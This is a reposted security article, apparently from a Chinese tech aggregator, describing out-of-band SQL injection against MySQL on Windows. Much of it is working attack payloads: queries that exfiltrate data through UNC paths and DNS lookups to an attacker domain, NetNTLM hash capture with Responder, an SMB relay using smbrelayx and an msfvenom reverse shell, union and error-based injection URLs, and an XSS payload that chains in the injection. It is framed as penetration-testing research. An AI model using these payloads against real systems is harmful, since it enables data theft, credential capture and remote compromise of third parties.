未加星标

MySQL Out-of-Band Hacking

字体大小 | |
[数据库(mysql) 所属分类 数据库(mysql) | 发布者 店小二05 | 时间 2017 | 作者 红领巾 ] 0人收藏点击收藏
Overview

Out-of-band injections are very well researched when it comes to mssql and Oracle. But in mysql I noticed that this topic is not well researched. I thought of researching about this topic based on my experiences in SQL injections. For this purpose we can take advantage of functions such as load_file() and select … into outfile/dumpfile. Apart from that we can also steal NetNTLM hashes and perform SMB relay attacks. All this is possible only in MySQL under windows.

What is Out-of-Band Injection?

These attacks involve in alternative channels to extract data from the server. It might be HTTP(S) requests, DNS resolutions, file systems, E-mails, etc depending on the functionality of the back-end technology.

Limitations in MySQL

In MySQL there exists a global system variable known as ‘secure_file_priv’. This variable is used to limit the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT … INTO OUTFILE statements and the LOAD_FILE() function.

If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist, the server will not create it. If the variable is empty it has no effect, thus insecure configuration. If set to NULL, the server disables import and export operations. This value is permitted as of MySQL 5.5.53

Before MySQL 5.5.53 this variable is empty by default, hence allowing us to use these functions. But in the versions after 5.5.53 the value ‘NULL’ will disable these functions.

To check the value of this variable you can use any of these methods. The ‘secure_file_priv’ is a global variable and it’s a read only variable, which means you cannot change this during runtime.

select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like "secure_file_priv";

For example the default value in my MySQL 5.5.34 is empty, which means we can use these functions.


MySQL Out-of-Band Hacking

In MySQL 5.6.34 by default the value is NULL and this will disable import and export operations.


MySQL Out-of-Band Hacking
Workaround

Here are few workarounds I came up with to overcome this issue in versions after 5.5.53.

Starting the mysqld process, giving “ secure-file-priv=” parameter as empty. mysqld.exe --secure-file-priv= Adding an entry in the “my.ini” configuration file. secure-file-priv=

To find out the order the default options are loaded and paths to the configuration files type this.

mysqld.exe --help --verbose Pointing your configuration file to mysqld.exe

You can create a new file as ‘myfile.ini’ and give this file as the default configuration for MySQL.

mysqld.exe --defaults-file=myfile.ini

The content in your configuration.

[mysqld]
secure-file-priv= Extracting Data to a File System

In MySQL we can use a shared file system as an alternative channel to extract data.

select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt';
select @@version into outfile '//192.168.0.100/temp/out.txt';
select @@version into dumpfile '//192.168.0.100/temp/out.txt';

Note that if quotes are filtered you cannot use hex conversions or any other format for the file path.

Extracting Data using DNS Resolutions

Another channel that can be used in MySQL is DNS resolutions.

select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874));

You can clearly see the version 5.6.34 is sent along with the DNS query.


MySQL Out-of-Band Hacking

When MySQL tries to resolve the DNS query we can log the DNS requests and extract data successfully from the ‘hacker.site’ DNS server. Data is logged as a subdomain.


MySQL Out-of-Band Hacking

When extracting data note that you are dealing with DNS requests and special characters cannot be used. Make use of the MySQL string functions such as mid, substr, replace, etc to overcome such situations.

Stealing NetNTLM Hashes

As you have seen before that ‘load_file’ and ‘into outfile/dumpfile’ works fine with UNC paths under Windows, this can be used to resolve a non-existing path and when DNS fails the request will be sent as an LLMNR, NetBIOS-NS query. By poisoning the LLMNR protocol we can capture the NTLMv2 hashes.


MySQL Out-of-Band Hacking

Tools that we can use for this attack.

Responder llmnr_response MiTMf

I will be using Responder for this example. I’m running MySQL 5.6.34 on Windows 8 64-bit.

responder -I eth0 -rv

Next we can use ‘load_file’, ‘into outfile/dumpfile’ or ‘load data infile’ to resolve an invalid UNC path.

select load_file('\\\\error\\abc');
select load_file(0x5c5c5c5c6572726f725c5c616263);
select 'osanda' into dumpfile '\\\\error\\abc';
select 'osanda' into outfile '\\\\error\\abc';
load data infile '\\\\error\\abc' into table database.table_name;
MySQL Out-of-Band Hacking
SMB Relay Attacks

With the usage of functions such as ‘load_file’, ‘into outfile/dumpfile’ and ‘load data infile’ we are able to access UNC paths under Windows. We can abuse this feature in performing SMB relay attacks and simply pop a shell in the target machine. Here’s a visual demonstration of the SMB relay attack.


MySQL Out-of-Band Hacking

This is my lab setup configuration for this experiment.

MySQL Server Windows 8: 192.168.0.100 Attacker Kali : 192.168.0.101 Victim Windows 7: 192.168.0.103 (Running as Admin)

Tools used

smbrelayx Metasploit

First of all I generate a reverse shell on my Kali box and run ‘multi/handler’ module on Metasploit.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=443 -f exe > reverse_shell.exe

Next I run the ‘smbrelayx’ tool specifying the victim IP address and my generated reverse shell and wait for incoming connections.

smbrelayx.py -h 192.168.0.103 -e ./reverse_shell.exe

Once we execute any of these statements from the MySQL server we get our reverse shell from the victim box.

select load_file('\\\\192.168.0.101\\aa');
select load_file(0x5c5c5c5c3139322e3136382e302e3130315c5c6161);
select 'osanda' into dumpfile '\\\\192.168.0.101\\aa';
select 'osanda' into outfile '\\\\192.168.0.101\\aa';
load data infile '\\\\192.168.0.101\\aa' into table database.table_name;

These are the options in Metasploit from the module ‘multi/handler’.


MySQL Out-of-Band Hacking

Once the MySQL Server sends a request to the Kali box ‘smbrelayx’ will perform the SMB relay attack and upload our reverse shell and execute it.


MySQL Out-of-Band Hacking

If the attack is successful we get our reverse shell from the Windows 7 box.


MySQL Out-of-Band Hacking
Union and Error Based Injections

The ‘load_file’ function can be applied with both union and error based injections. For example in a union based scenario we can use OOB injections like this.

http://192.168.0.100/?id=-1'+union+select+1,load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)),3-- -

We can simply use error based techniques such as theBIGINToverflow method or theEXPerror based method.

http://192.168.0.100/?id=-1' or !(select*from(select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)))x)-~0-- -
http://192.168.0.100/?id=-1' or exp(~(select*from(select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)))a))-- -

Instead of ‘or’ you can use ||, |, and, &&, &, >>, <<, ^, xor, <=, <, ,>, >=, *, mul, /, div, -, +, %, mod.

XSS + SQLi

We can combine XSS attacks with MySQL and these might come handy in different scenarios in the penetration testing. We can perform both stealing of NetNTLM hashes and SMB relay attacks combining with XSS. If the XSS is persistent, each time the victim visits the page he will be infected.

Note that when dealing with javascript you are under the Same Origin Policy (SOP).

<svg onload=fetch(("http://192.168.0.100/?id=-1'+union+select+1,load_file(0x5c5c5c5c6572726f725c5c6161),3-- -"))>

You can also use MySQL to echo out HTML, thus echoing out an invalid UNC path to steal NetNTLM hashes or directly perform an SMB relay attack by using the IP of the attacker. These UNC paths get resolved only in IE web browsers.

http://192.168.0.100/?id=-1' union select 1,'<img src="\\\\error\\aa">'%23 Conclusion

These discussed methods can be used when all in-band methods fail due to the vectors being disabled, limited or filtered and when the only option is to use inference techniques. The ‘select … into outfile/dumpfile’ can be used with union based injections. The ‘load_file’ method can be used with both union based injections and error based injections. When it comes to infrastructure hacking these methods might be very useful. Exploitation of a vulnerability is not always straight forward. You have to be very creative in using these techniques in real world scenarios.

Acknowledgements

Special thanks to @m3g9tr0n for his support with my research.

Paper https://packetstormsecurity.com/files/140832/MySQL-OOB-Hacking.html References https://dev.mysql.com/doc/refman/5.5/en/ https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python https://pentest.blog/what-is-llmnr-wpad-and-how-to-abuse-them-during-pentest/

本文数据库(mysql)相关术语:navicat for mysql mysql workbench mysql数据库 mysql 存储过程 mysql安装图解 mysql教程 mysql 管理工具

主题: SQLMySQLWindowsJavaScriptJavaHTMLSQL ServerUTWindows 7SOP
tags: file,select,MySQL,load,into
分页:12
转载请注明
本文标题:MySQL Out-of-Band Hacking
本站链接:http://www.codesec.net/view/530229.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 数据库(mysql) | 评论(0) | 阅读(148)